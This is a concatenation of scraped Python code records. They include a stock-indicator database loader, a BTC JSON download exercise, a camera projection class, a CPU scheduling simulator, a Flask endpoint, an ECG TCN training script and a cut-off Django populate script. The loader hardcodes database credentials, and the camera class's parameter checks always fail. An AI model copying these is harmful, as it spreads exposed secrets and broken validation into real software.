ip, 'mysql', 'pregaine', 'RF69xy7C' )\r\n \r\n # 移除表格\r\n db_M.ResetTable( '月' )\r\n\r\n # 建立資料表\r\n db_M.CreateTable( '月' )\r\n \r\n stock_M = { '月': [ db_M, '_月線技術指標.csv' ] }\r\n\r\n path = '/home/pi/Downloads/技術指標/month/'\r\n\r\n # 讀取資料夾\r\n for file in glob( '{}*_月線技術指標.csv'.format( path ) ):\r\n \r\n if os.path.getsize( file ) == 0:\r\n continue\r\n \r\n num = file.split( '_' )[ 0 ]\r\n num = num.replace( path, '' )\r\n data = file[ -10:-9 ]\r\n\r\n # print( file )\r\n\r\n if data in stock_M.keys( ):\r\n \r\n Obj = stock_M[ data ][ 0 ]\r\n Obj.stock = num\r\n \r\n print( '讀取 {}'.format( file ) )\r\n print( '股號 {}'.format( num ) )\r\n \r\n print( data )\r\n \r\n # if num != '2887':\r\n # continue\r\n\r\n Obj.ReadCSV( file )\r\n Obj.CompareDB( data ) \r\n Obj.WriteDB( data )\r\n\r\n else:\r\n print( '讀取錯誤 {}'.format( data ) )\r\n \r\n # exit()\r\n \r\nif __name__ == '__main__':\r\n\r\n start_tmr = time.time( )\r\n main( )\r\n print( '{:04.1f}'.format( (time.time( ) - start_tmr) ) )\r\n","sub_path":"寫入技術指標月.py","file_name":"寫入技術指標月.py","file_ext":"py","file_size_in_byte":12638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"331995994","text":"\"\"\"\n下载\n\"\"\"\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\n\nfrom urllib.request import urlopen\n\nimport json\nimport requests\n\njson_url = \"https://raw.githubusercontent.com/muxuezi/btc/master/btc_close_2017.json\"\nresponse = urlopen(json_url)\n\n# 读取数据\nreq = response.read()\n# print(type(req))\n# print(req)\n# 将数据写入文件\nwith open(\"btc_close_2017_down.json\", 'wb') as f:\n f.write(req)\n\n# 加载json格式\n# with open(\"btc_close_2017_down.json\", 'r') as f:\n# file_urllib = json.load(f)\n# print(file_urllib)\nfile_urllib = json.loads(str(req, 'utf-8'))\nprint(file_urllib)\n\n# 使用requests\n\nreq = requests.get(json_url)\nwith open('btc_close_2017_down_requests.json', 'w') as f:\n f.write(req.text)\n\nprint(req.json())\n\n","sub_path":"PythonCrashCourse/chapter16/btc_close_2017.py","file_name":"btc_close_2017.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"81679905","text":"import numpy as np\nimport os\n\n\nclass Camera(object):\n\n def __init__(self):\n # C\n self.__c = None\n # P_{ref}\n self.__p_ref = None\n # V'\n self.__v_prime = None\n # h\n self.__h = None\n # d\n self.__d = None\n # f\n self.__f = None\n # N, U, V\n self.N = None\n self.__u = None\n self.__v = None\n # R, T\n self.__r = None\n self.__t = None\n # M_{view}, # M_{pers}\n 
self.m_view = None\n self.m_pers = None\n # M_{view}^{-1}, # M_{pers}^{-1}\n self.m_view_inv = None\n self.m_pers_inv = None\n # ready\n self.is_ready = False\n\n def set(self, c, p_ref, v_prime, h, d, f):\n # set\n if type(c) != list or len(c) != 3 \\\n or type(c[0]) != int or type(c[0]) != float \\\n or type(c[1]) != int or type(c[1]) != float \\\n or type(c[2]) != int or type(c[2]) != float:\n raise Exception('There is a type error in parameter `c`.')\n if type(p_ref) != list or len(p_ref) != 3 \\\n or type(p_ref[0]) != int or type(p_ref[0]) != float \\\n or type(p_ref[1]) != int or type(p_ref[1]) != float \\\n or type(p_ref[2]) != int or type(p_ref[2]) != float:\n raise Exception('There is a type error in parameter `p_ref`.')\n if type(v_prime) != list or len(v_prime) != 3 \\\n or type(v_prime[0]) != int or type(v_prime[0]) != float \\\n or type(v_prime[1]) != int or type(v_prime[1]) != float \\\n or type(v_prime[2]) != int or type(v_prime[2]) != float:\n raise Exception('There is a type error in parameter `v_prime`.')\n if type(h) != int and type(h) != float:\n raise Exception('Parameter `h` must be a number.')\n if type(d) != int and type(d) != float:\n raise Exception('Parameter `d` must be a number.')\n if type(f) != int and type(f) != float:\n raise Exception('Parameter `f` must be a number.')\n self.__c = np.array(c)\n self.__p_ref = np.array(p_ref)\n self.__v_prime = np.array(v_prime)\n self.__h = h\n self.__d = d\n self.__f = f\n self.__calculate()\n\n def set_by_file(self, file_path):\n # read file\n with open(os.path.split(os.path.realpath(__file__))[0] + os.sep + file_path) as file:\n line_list = file.readlines()\n for line in line_list:\n line_split = line.split()\n if len(line_split) <= 0:\n continue\n if line_split[0] == \"C\":\n self.__c = np.array([float(line_split[1]), float(line_split[2]), float(line_split[3])])\n elif line_split[0] == \"P_{ref}\":\n self.__p_ref = np.array([float(line_split[1]), float(line_split[2]), float(line_split[3])])\n elif line_split[0] == \"V\\'\":\n self.__v_prime = np.array([float(line_split[1]), float(line_split[2]), float(line_split[3])])\n elif line_split[0] == \"h\":\n self.__h = float(line_split[1])\n elif line_split[0] == \"d\":\n self.__d = float(line_split[1])\n elif line_split[0] == \"f\":\n self.__f = float(line_split[1])\n # calculate `m_view` and `m_pers`\n self.__calculate()\n\n def __calculate(self):\n # N, U, V\n temp = self.__p_ref - self.__c\n self.N = temp / np.linalg.norm(temp, 2)\n temp = np.cross(self.N, self.__v_prime)\n self.__u = temp / np.linalg.norm(temp, 2)\n self.__v = np.cross(self.__u, self.N)\n # R, T\n self.__r = np.eye(4)\n self.__r[0][:3] = self.__u\n self.__r[1][:3] = self.__v\n self.__r[2][:3] = self.N\n self.__t = np.eye(4)\n self.__t[0][3] = -self.__c[0]\n self.__t[1][3] = -self.__c[1]\n self.__t[2][3] = -self.__c[2]\n # M_{view}, # M_{pers}\n self.m_view = np.dot(self.__r, self.__t)\n self.m_pers = np.zeros((4, 4))\n self.m_pers[0][0] = self.__d / self.__h\n self.m_pers[1][1] = self.__d / self.__h\n self.m_pers[2][2] = self.__f / (self.__f - self.__d)\n self.m_pers[2][3] = -self.__d * self.m_pers[2][2]\n self.m_pers[3][2] = 1\n # M_{view}^{-1}, # M_{pers}^{-1}\n self.m_view_inv = np.linalg.inv(self.m_view)\n self.m_pers_inv = np.linalg.inv(self.m_pers)\n # ready\n self.is_ready = True\n","sub_path":"lab3/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 
+{"seq_id":"506447074","text":"'''\nAbdullah Zameek - Scheduling Lab (simulate FCFS, SJF, RR and HRPN)\n\n'''\nimport sys\n\n########\n#These are global flags that are going to be used over the course of the code. \nglobal VERBOSE, SHOW_RANDOM, OPEN, randomFile, RR, IOUtilisation\nIOUtilisation = 0\nRR = False\nVERBOSE = False\nSHOW_RANDOM = False\nOPEN = True\n#################### HELPER FUNCTIONS/CLASSES START HERE ###############################\n\ndef processInput():\n '''Returns a list of lists of all process blocks and the number of processes.'''\n with open(sys.argv[-1], 'r') as f:\n contents = f.read()\n contents = contents.split()\n contents = [int(i) for i in contents]\n numProcesses = contents.pop(0)\n return [contents[i:i + 4] for i in range(0, len(contents), 4)], numProcesses\n\ndef randomOS(U):\n '''Returns the value 1 + X mod U '''\n randomNo = int(randomFile.readline().strip())\n return 1 + randomNo % U\n\nclass Timer:\n def __init__(self):\n self.timer = 0\n\n def getTime(self):\n return self.timer\n \n def update(self):\n self.timer+=1\n\n################## END OF HELPER FUNCTIONS/CLASSES #####################################\n\nclass Process: \n def __init__(self,A,B,C,M,i):\n self.A = A\n self.B = B\n self.C = C\n self.M = M\n self.i = i\n self.state = \"unstarted\" # There are five possible states -> unstarted, ready, running, blocked, terminated\n self.readyTime = 0\n self.burst = 0\n self.previousBurst = 0 \n self.remainingTime = C\n self.finishTime = 0\n self.runningTime = 0\n self.blockedTime = 0\n self.waitingTime = 0\n self.turnaroundTime = 0\n\n ### JUST FOR RR ######\n self.quantum = 2\n ### JUST FOR RR ######\n\n\n def updateState(self):\n curTime = sysClock.getTime()\n if self.state == \"unstarted\":\n if curTime == self.A:\n self.setReady()\n\n if self.state == \"blocked\":\n if self.burst == 0:\n self.setReady()\n\n if self.state == \"running\":\n if self.remainingTime == 0:\n self.state = \"terminated\"\n self.finishTime = curTime\n self.burst = 0\n elif self.burst == 0:\n self.setBlocked()\n elif RR:\n if self.quantum == 0:\n self.setReady()\n return\n\n def getCPUBurst(self):\n self.previousBurst = randomOS(self.B)\n self.burst = self.previousBurst\n return\n\n def getIOBurst(self):\n self.burst = self.previousBurst * self.M\n return \n\n def setBlocked(self):\n self.getIOBurst()\n self.state = \"blocked\"\n return\n \n def setReady(self):\n curTime = sysClock.getTime()\n self.state = \"ready\"\n self.readyTime = curTime\n return\n\n def setRunning(self):\n self.state = \"running\"\n if RR:\n self.quantum = 2\n if self.burst == 0:\n self.getCPUBurst()\n return\n\n def getRatio(self):\n return self.turnaroundTime/max(1,self.runningTime)\n\n def updateTimes(self):\n if self.state not in [\"unstarted\", \"terminated\"]: #Nothing to do in these two cases \n self.turnaroundTime+=1\n if self.state == \"ready\":\n self.waitingTime+=1\n elif self.state == \"running\":\n self.runningTime += 1\n self.remainingTime -= 1\n if RR:\n self.quantum -=1\n if (self.burst):\n self.burst -=1\n elif self.state == \"blocked\":\n self.blockedTime +=1\n if self.burst > 0:\n self.burst -=1\n return \n\n def printProcessAttr(self):\n print(\"({} {} {} {}) \".format(self.A, self.B, self.C, self.M), end='')\n\n def printProcess(self):\n print(\"\\t(A, B, C, M) = ({}, {}, {}, {})\\n\\tFinishing Time: {}\\n\\tTurnaround Time: {}\\n\\tI/O Time: {}\\n\\tWaiting Time: {}\\n\\t\".format(self.A, self.B, self.C, self.M, self.finishTime, self.finishTime-self.A, self.blockedTime, 
self.waitingTime))\n\n\n######################## MANIPULATE THE PROCESSLIST #############################################\n\ndef orderByArrivalTime(processList):\n processList.sort(key=lambda process: process.A)\n return processList\n\ndef orderByInput(processList):\n processList.sort(key=lambda process: process.i)\n return processList\n\ndef orderByReadyState(processList):\n processList.sort(key=lambda process: process.readyTime)\n return processList\n\ndef orderByShortestJob(processList):\n processList.sort(key=lambda process: process.C - process.runningTime)\n return processList\n\ndef orderByHPRN(processList):\n processList.sort(key=lambda process: -process.getRatio())\n return processList \n\ndef checkComplete(processList):\n global finishTime\n for process in processList:\n if process.state != \"terminated\":\n return False\n finishTime = sysClock.getTime() - 1\n return True\n \ndef getProcessesByState(processList, state):\n newList = []\n for process in processList:\n if process.state == state:\n newList.append(process)\n return newList\n\ndef updateProcessTimers(processList):\n global IOUtilisation\n if getProcessesByState(processList, \"blocked\"):\n IOUtilisation += 1\n for process in processList:\n process.updateTimes()\n return \n\ndef updateProcessStates(processList):\n for process in processList:\n process.updateState()\n return\n\ndef printListSummary(processList):\n cpuUtil = sum(list([process.runningTime for process in processList])) / finishTime\n ioUtil = (IOUtilisation / finishTime)\n throughput = 100*len(processList) / finishTime\n turnaround = sum(list([process.turnaroundTime for process in processList])) / len(processList)\n waitingTime = sum(list([process.waitingTime for process in processList])) / len(processList)\n print(\"Summary Data :\\n\\tFinishing Time: {}\\n\\tCPU Utilisation: {:.6f}\\n\\tI/O Utilisation: {:.6f}\\n\\tThroughput: {:.6f} processes per hundred cycles\\n\\tAverage turnaround time: {:.6f}\\n\\tAverage Waiting Time: {:.6f}\".format(finishTime,cpuUtil,ioUtil, throughput, turnaround, waitingTime))\n\n\n####################### END OF PROCESS LIST MANIPULATION ##########################################\n\n\n########################## SCHEDULING ALGORITHM ##################################################\n\ndef schedulingAlgorithm(processList, schedulingMethod, RndR=False):\n global RR \n RR = RndR\n i = 0\n while not checkComplete(processList):\n if VERBOSE:\n verboseLine= \"\"\n print(\"Before Cycle {} \".format(str(i)),end='')\n for process in processList:\n verboseLine += process.state + \" : \" + str(process.burst) + \" \"\n print(verboseLine)\n i+=1\n updateProcessTimers(processList)\n updateProcessStates(processList)\n if not(getProcessesByState(processList, \"running\")):\n readyProcesses = orderByArrivalTime(orderByInput(getProcessesByState(processList,\"ready\")))\n if schedulingMethod == \"First Come First Served\":\n readyProcesses = orderByReadyState(readyProcesses) #this only works for first come first served \n if schedulingMethod == \"Round Robin\":\n readyProcesses = orderByReadyState(readyProcesses)\n if schedulingMethod == \"Shortest Job First\":\n readyProcesses = orderByShortestJob(readyProcesses)\n if schedulingMethod == \"Highest Penalty Ratio Next\":\n readyProcesses = orderByHPRN(readyProcesses)\n if readyProcesses:\n readyProcesses.pop(0).setRunning()\n sysClock.update()\n print()\n print(\"The scheduling algorithm used was \"+schedulingMethod)\n print()\n return processList\n\n########################## MAIN 
##################################################\ndef main():\n global VERBOSE, SHOW_RANDOM\n global sysClock\n global finishTime \n global IOUtilisation\n global randomFile\n randomFile = open(\"random-numbers.txt\", 'r')\n IOUtilisation =0 \n finishTime = 0\n\n if \"--verbose\" in sys.argv:\n VERBOSE = True\n if \"--show-random\" in sys.argv:\n SHOW_RANDOM = True\n \n ################################# FIRST COME FIRST SERVED ################################\n\n #First, we take the input files and read the inputs into a list of lists and return it.\n processes, numProcesses = processInput()\n sysClock = Timer()\n processList = []\n #Then, we take this list of lists of processes and then create each list into a \"Process\"\n for i in range(len(processes)):\n processList.append(Process(*processes[i],i)) \n print(\"The original input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print()\n #Then, we take each of these processes and then append it to a process list.\n processList = orderByArrivalTime(processList)\n \n print(\"The sorted input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print(\"\\n\")\n processList = schedulingAlgorithm(processList, \"First Come First Served\")\n for i in range(len(processList)):\n print(\"Process {}:\\t\".format(str(i)))\n processList[i].printProcess()\n #Then we manipulate the process list until all the processes have a state of terminated and then we're done. \n printListSummary(processList)\n print(\"---------------------------------------------------------------------------------\")\n ########################### ROUND ROBIN #################################################\n IOUtilisation =0 \n finishTime = 0\n randomFile.seek(0)\n #First, we take the input files and read the inputs into a list of lists and return it.\n processes, numProcesses = processInput()\n sysClock = Timer()\n processList = []\n #Then, we take this list of lists of processes and then create each list into a \"Process\"\n for i in range(len(processes)):\n processList.append(Process(*processes[i],i)) \n print(\"The original input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print()\n #Then, we take each of these processes and then append it to a process list.\n processList = orderByArrivalTime(processList)\n \n print(\"The sorted input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print(\"\\n\")\n processList = schedulingAlgorithm(processList, \"Round Robin\", True)\n for i in range(len(processList)):\n print(\"Process {}:\\t\".format(str(i)))\n processList[i].printProcess()\n #Then we manipulate the process list until all the processes have a state of terminated and then we're done. 
\n printListSummary(processList)\n print(\"---------------------------------------------------------------------------------\")\n ########################### SHORTEST JOB FIRST #################################################\n IOUtilisation =0 \n finishTime = 0\n randomFile.seek(0)\n #First, we take the input files and read the inputs into a list of lists and return it.\n processes, numProcesses = processInput()\n sysClock = Timer()\n processList = []\n #Then, we take this list of lists of processes and then create each list into a \"Process\"\n for i in range(len(processes)):\n processList.append(Process(*processes[i],i)) \n print(\"The original input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print()\n #Then, we take each of these processes and then append it to a process list.\n processList = orderByArrivalTime(processList)\n \n print(\"The sorted input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print(\"\\n\")\n processList = schedulingAlgorithm(processList, \"Shortest Job First\")\n for i in range(len(processList)):\n print(\"Process {}:\\t\".format(str(i)))\n processList[i].printProcess()\n #Then we manipulate the process list until all the processes have a state of terminated and then we're done. \n printListSummary(processList)\n print(\"---------------------------------------------------------------------------------\")\n ########################### HIGHEST PENALTY RATIO NEXT #################################################\n IOUtilisation =0 \n finishTime = 0\n randomFile.seek(0)\n #First, we take the input files and read the inputs into a list of lists and return it.\n processes, numProcesses = processInput()\n sysClock = Timer()\n processList = []\n #Then, we take this list of lists of processes and then create each list into a \"Process\"\n for i in range(len(processes)):\n processList.append(Process(*processes[i],i)) \n print(\"The original input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print()\n #Then, we take each of these processes and then append it to a process list.\n processList = orderByArrivalTime(processList)\n \n print(\"The sorted input was : \"+str(numProcesses)+\" \", end='')\n for process in processList:\n process.printProcessAttr()\n print(\"\\n\")\n processList = schedulingAlgorithm(processList, \"Highest Penalty Ratio Next\")\n for i in range(len(processList)):\n print(\"Process {}:\\t\".format(str(i)))\n processList[i].printProcess()\n #Then we manipulate the process list until all the processes have a state of terminated and then we're done. 
\n printListSummary(processList)\n print(\"---------------------------------------------------------------------------------\")\n\n\n \nif __name__ == \"__main__\":\n main()","sub_path":"Lab2/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":13985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"283343219","text":"from flask import Response, request\nfrom database.sucursal import Sucursal\nfrom flask_restful import Resource\n\nclass SucursalApi(Resource):\n def get(self):\n agencies = Sucursal.objects().to_json()\n return Response(agencies, mimetype=\"application/json\", status=200)\n\n def post(self):\n body = request.get_json()\n agency = Sucursal(**body).save()\n id = agency.id\n return {'id': str(id)}, 200\n","sub_path":"resources/sucursal.py","file_name":"sucursal.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"277943545","text":"import torch\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport sys\nfrom dataset import MitbinDataset\nfrom model import TCN\nimport numpy as np\nimport argparse\nfrom collections import defaultdict\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score\nimport os\n\nparser = argparse.ArgumentParser(description='Sequence Modeling - MITBIN-TCN')\nparser.add_argument('--batch_size', type=int, default=32, metavar='N',\n help='batch size (default: 32)')\nparser.add_argument('--cuda', action='store_true',\n help='use CUDA (default: True)')\nparser.add_argument('--dropout', type=float, default=0.05,\n help='dropout applied to layers (default: 0.05)')\nparser.add_argument('--clip', type=float, default=-1,\n help='gradient clip, -1 means no clip (default: -1)')\nparser.add_argument('--epochs', type=int, default=10,\n help='upper epoch limit (default: 20)')\nparser.add_argument('--ksize', type=int, default=7,\n help='kernel size (default: 7)')\nparser.add_argument('--levels', type=int, default=8,\n help='# of levels (default: 8)')\nparser.add_argument('--log-interval', type=int, default=500, metavar='N',\n help='report interval (default: 10')\nparser.add_argument('--lr_T', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_E', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_G', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_R', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--optim', type=str, default='Adam',\n help='optimizer to use (default: Adam)')\nparser.add_argument('--nhid', type=int, default=25,\n help='number of hidden units per layer (default: 25)')\nparser.add_argument('--seed', type=int, default=1111,\n help='random seed (default: 1111)')\nparser.add_argument('--fold', type=int, default=0,\n help='use which fold data (default: 0)')\nparser.add_argument('--num_threds', type=int, default=0,\n help='number of threads to fetch data (default: 0)')\nparser.add_argument('--alpha', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--beta', type=float, default=1.0,\n help='weight to control loss 
(default: 1.0)')\nparser.add_argument('--gamma', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--savedir', type=str, default='checkpoint0',\n help='weight to control loss (default: 1.0)')\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\nif torch.cuda.is_available():\n if not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\ndef mkdir(path):\n if not os.path.exists(path):\n os.makedirs(path)\nmkdir(args.savedir)\n\nbatch_size = args.batch_size\nbatch_size = 1\nn_classes = 2\ninput_channels_T = 3\ninput_channels_E = 1\ninput_channels_G = 1\n\n#seq_length = 500\nepochs = args.epochs\nsteps = 0\nnum_threds = args.num_threds\n\nalpha = args.alpha\nbeta = args.beta\ngamma = args.gamma\n\nprint(args)\ntrain_dataset = MitbinDataset(args, is_for_train=True)\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=num_threds,\n drop_last=False)\ntest_dataset = MitbinDataset(args, is_for_train=False)\ntest_loader = torch.utils.data.DataLoader(\n test_dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=num_threds,\n drop_last=False)\n\t\t\nchannel_sizes = [args.nhid] * args.levels\nkernel_size = args.ksize\n\nmodel_T = TCN(input_channels_T, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\nmodel_E = TCN(input_channels_E, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\nmodel_G = TCN(input_channels_G, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\n\nif args.cuda:\n model_T.cuda()\n model_E.cuda()\n model_G.cuda()\n \noptimizer = getattr(optim, args.optim)([{'params': model_T.parameters(), 'lr': args.lr_T},\n {'params': model_E.parameters(), 'lr': args.lr_E},\n {'params': model_G.parameters(), 'lr': args.lr_G}\n ])#,momentum=0.9)\n\ndef save_network(network, network_label, epoch_label):\n save_filename = 'net_epoch_%d_id_%s.pth' % (epoch_label, network_label)\n save_path = os.path.join(args.savedir, save_filename)\n torch.save(network.state_dict(), save_path)\n print ('saved net: %s' % save_path)\n \ndef train(ep):\n global steps\n total_loss = 0\n model_T_loss = 0\n model_E_loss = 0\n model_G_loss = 0\n \n model_T.train()\n model_E.train()\n model_G.train()\n \n correct = 0\n \n for batch_idx, (data, data_reverse, order_data, order_data_reverse, \\\n label, subject, feature) in enumerate(train_loader):\n \n data = torch.Tensor(data)\n data_reverse = torch.Tensor(data_reverse)\n order_data = torch.Tensor(order_data)\n order_data_reverse = torch.Tensor(order_data_reverse) \n feature = torch.Tensor(feature)\n target = torch.LongTensor(label)\n \n if args.cuda:\n data, data_reverse, order_data, order_data_reverse, feature, target = data.cuda(), data_reverse.cuda(), order_data.cuda(), order_data_reverse.cuda(), \\\n feature.cuda(), target.cuda()\n \n data = data.view(-1, input_channels_E, data.shape[0])\n data_reverse = data_reverse.view(-1, input_channels_E, data_reverse.shape[0])\n order_data = order_data.view(-1, input_channels_T, order_data.shape[1])\n order_data_reverse = order_data_reverse.view(-1, input_channels_T, order_data_reverse.shape[1])\n \n data, data_reverse, order_data, order_data_reverse, target, feature = Variable(data), Variable(data_reverse), \\\n Variable(order_data), Variable(order_data_reverse), \\\n Variable(target), Variable(feature)\n\n output_T = model_T.forward_T(order_data, order_data_reverse) \n output_E, _ = 
model_E.forward_E(data, data_reverse, feature)\n output_G, _, _ = model_G.forward_G(data, data_reverse, output_T.detach(), output_E.detach())\n\n #print (output_T.shape)\n #print (output_G.shape)\n #print (output_E.shape)\n\n optimizer.zero_grad()\n loss_T = F.nll_loss(output_T, target)\n loss_E = F.nll_loss(output_E, target)\n loss_G = F.nll_loss(output_G, target)\n\n loss = alpha * loss_T + beta * loss_E + gamma * loss_G\n \n loss.backward()\n optimizer.step()\n total_loss += float(loss)\n #model_T_loss += float(loss_T)\n #model_E_loss += float(loss_E)\n #model_G_loss += float(loss_G)\n\n pred = output_G.data.max(1, keepdim=True)[1]\n correct += pred.eq(target.data.view_as(pred)).cpu().sum()\n\n if batch_idx > 0 and batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tTotal Loss: {:.6f}\\t ACC: {:.4f}'.format(\n ep, batch_idx * batch_size, len(train_dataset),\n 100. * batch_idx / len(train_dataset), total_loss/args.log_interval, float(correct) / (batch_idx*batch_size) ))\n total_loss = 0\n\ndef cal_performance(subject_dic, count_dic, real_dic):\n # vote results\n avg_acc = 0\n ind = 0\n real = []\n logits = []\n for key in subject_dic:\n subject_acc = subject_dic[key] / count_dic[key]\n print ('Subject %d: ACC is %f' %(key, subject_acc))\n ind += 1\n avg_acc += subject_acc\n real.append(real_dic[key])\n if subject_acc > 0.5:\n logit = real_dic[key]\n else:\n logit = 1 - real_dic[key]\n logits.append(logit)\n print ('Avg Subjects: ACC is %f' % (float(avg_acc) / ind))\n y_true = np.array(real)\n y_pred = np.array(logits)\n print ('Accuracy of Classifier:%f' % accuracy_score(y_true, y_pred))\n print ('ROC-AUC of Classifier:%f' % roc_auc_score(y_true, y_pred))\n precision, recall, _thresholds = precision_recall_curve(y_true, y_pred) \n print ('PR-AUC of Classifier:%f' % auc(recall, precision))\n print ('Macro-F1 of Classifier:%f' % f1_score(y_true, y_pred, average='micro'))\n print (\"precision:\", precision_score(y_true, y_pred))\n print (\"recall:\", recall_score(y_true, y_pred))\n \ndef test():\n model_T.eval()\n model_E.eval()\n model_G.eval()\n \n test_loss = 0\n \n correct_T = 0\n correct_E = 0\n correct_G = 0\n subject_dic_T = defaultdict(int)\n subject_dic_E = defaultdict(int)\n subject_dic_G = defaultdict(int)\n \n count_dic = defaultdict(int)\n\n real_dic = {}\n\n with torch.no_grad():\n for data, data_reverse, order_data, order_data_reverse, \\\n label, subject, feature in test_loader:\n data = torch.Tensor(data)\n data_reverse = torch.Tensor(data_reverse)\n order_data = torch.Tensor(order_data)\n order_data_reverse = torch.Tensor(order_data_reverse) \n feature = torch.Tensor(feature)\n target = torch.LongTensor(label)\n \n if args.cuda:\n data, data_reverse, order_data, order_data_reverse, feature, target = data.cuda(), data_reverse.cuda(), order_data.cuda(), order_data_reverse.cuda(), \\\n feature.cuda(), target.cuda()\n \n #seq_length = data.shape[1]\n #print (seq_length)\n data = data.view(-1, input_channels_E, data.shape[0])\n data_reverse = data_reverse.view(-1, input_channels_E, data_reverse.shape[0])\n order_data = order_data.view(-1, input_channels_T, order_data.shape[1])\n order_data_reverse = order_data_reverse.view(-1, input_channels_T, order_data_reverse.shape[1])\n \n data, data_reverse, order_data, order_data_reverse, target, feature = Variable(data), Variable(data_reverse), \\\n Variable(order_data), Variable(order_data_reverse), \\\n Variable(target), Variable(feature)\n\n output_T = model_T.forward_T(order_data, order_data_reverse) \n 
output_E, _ = model_E.forward_E(data, data_reverse, feature)\n output_G, _ , _= model_G.forward_G(data, data_reverse, output_T.detach(), output_E.detach())\n \n test_loss += F.nll_loss(output_G, target, size_average=False).item()\n\n pred_T = output_T.data.max(1, keepdim=True)[1]\n eq_T = pred_T.eq(target.data.view_as(pred_T)).cpu().sum()\n correct_T += eq_T\n\n pred_E = output_E.data.max(1, keepdim=True)[1]\n eq_E = pred_E.eq(target.data.view_as(pred_E)).cpu().sum()\n correct_E += eq_E\n \n pred_G = output_G.data.max(1, keepdim=True)[1]\n eq_G = pred_G.eq(target.data.view_as(pred_G)).cpu().sum()\n correct_G += eq_G\n\n subject_dic_T[subject.cpu().numpy()[0]] += eq_T.numpy()\n subject_dic_E[subject.cpu().numpy()[0]] += eq_E.numpy()\n subject_dic_G[subject.cpu().numpy()[0]] += eq_G.numpy()\n \n \n count_dic[subject.cpu().numpy()[0]] += 1.0\n real_dic[subject.cpu().numpy()[0]] = target.cpu().numpy()[0]\n\n test_loss /= len(test_dataset)\n print('\\nTest set: Average loss: {:.4f}, ACC_T: {:.4f} ACC_E: {:.4f} ACC_G: {:.4f}\\n'.format(\n test_loss, float(correct_T) / len(test_dataset), float(correct_E) / len(test_dataset), float(correct_G) / len(test_dataset)))\n\n print (\"-------------------------model_T--------------------------------\")\n cal_performance(subject_dic_T, count_dic, real_dic)\n print (\"-------------------------model_E--------------------------------\")\n cal_performance(subject_dic_E, count_dic, real_dic)\n print (\"-------------------------model_G--------------------------------\")\n cal_performance(subject_dic_G, count_dic, real_dic)\n \n return test_loss\n\n\nif __name__ == \"__main__\":\n for epoch in range(1, epochs+1):\n train(epoch)\n test()\n save_network(model_T, \"T\", epoch)\n save_network(model_E, \"E\", epoch)\n save_network(model_G, \"G\", epoch)\n","sub_path":"mitbin_test.py","file_name":"mitbin_test.py","file_ext":"py","file_size_in_byte":13312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"573649687","text":"import os\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tango_with_django.settings')\n\nimport django\ndjango.setup()\nfrom rango.models import Category, Page\n\ndef populate():\n\n python_pages = [\n {\"title\": \"Official Python Tutorial\", \"url\": \"http://docs.python.org\"},\n {\"title\": \"How to be a computer scientist\", \"url\": \"http://www.somebullshit.com\"},\n {\"title\": \"Learn Python in 10 mins\", \"url\": \"http://www.korokithakis.net\"}\n ]\n\n django_pages = [\n {\"title\": \"Official Django Tutorial\", \"url\": \"http://docs.djangoproject.com\"},\n {\"title\": \"Django Rocks\", \"url\": \"http://www.djangorocks.com\"},\n {\"title\": \"Tango with Djano\", \"url\": \"http://www.tangowithdjango.com\"}\n ]\n\n other_pages = [\n {\"title\": \"Volvic\", \"url\": \"http://www.volvic.com\"},\n {\"title\": \"Facebook\", \"url\": \"http://www.facebook.com\"}\n ]\n\n cats = {\"Python\": {\"pages\": python_pages,\"views\": 128, \"likes\": 64}, \"Django\": {\"pages\": django_pages, \"views\": 64, \"likes\":32}, \"Random\": {\"pages\": other_pages, \"views\":32,\"likes\":16}}\n\n for cat, cat_data in cats.items():\n c = add_cat(cat, cat_data[\"views\"],cat_data[\"likes\"])\n for p in cat_data[\"pages\"]:\n add_page(c, p[\"title\"], p[\"url\"])\n\n for c in Category.objects.all():\n for p in 